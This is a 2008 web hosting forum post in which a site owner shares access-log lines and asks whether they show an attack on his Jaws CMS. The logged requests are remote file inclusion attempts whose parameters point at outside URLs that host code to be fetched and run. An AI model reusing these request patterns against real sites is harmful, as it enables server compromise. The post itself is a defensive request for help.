Web Hosting Forum | Lunarpages

Author Topic: Hack attempt or exploit?  (Read 3423 times)

Offline cgrobin

  • Trekkie
  • **
  • Posts: 15
    • http://cgrobin.com
Hack attempt or exploit?
« on: February 25, 2008, 03:59:14 PM »
I was reviewing my logs last night, and I'm finding all kinds of bizarre entries I've never seen before.  I tried to Google parts of the entry and found references to a Joomla exploit.   

Here is a sample entry from my log:
Quote
ezechiel.sdb.cz!03/Feb!20:11:59!!200 609!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:00!leftnav.htm!200 2179!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:01!home.html!200 1826!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:02!Tagged.shtml!200 964!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:03!jaws!301 304!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:04!jaws/!200 3120!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:05!jaws/?gadget=http%3A%2F%2Fwww.feliciano.de%2FWebgalerie%2Fbilder%2FItaly%2Fune%2Fyiwul%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:06!jaws/?gadget=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:07!jaws/?gadget=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:08!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:09!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.ce-cioceoforum.com%2Ftalk%2Ft1%2Froda%2Filubov%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:10!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:11!jaws/?gadget=Phoo!200 4480!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:13!jaws/index.php/photos/album/1.html!200 5645!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:14!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:15!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:16!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:20!jaws/index.php/photos/album/?gadget=Phoo!200 4451!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:22!jaws/index.php/photos/album/index.php?photos/album/2.html!200 4250!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:24!jaws/index.php/photos/album/index.php?photos/album/2/photo/11.html!200 3055!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

Here are more entries from my February log, copied into a Word doc.   http://cgrobin.com/HackFeb.doc

I have Jaws running on my site, and it seems to be trying to use it to hit another server.   I don't see anything off on my account, but I don't want someone else to think I'm the one attacking there server.

Is anyone else getting this, and is there anything that can be done?   I have a small board in a subdomain and members have been commenting the site has been slow and I wonder now if the server is getting a lot of these requests.

Thanks

 

Share |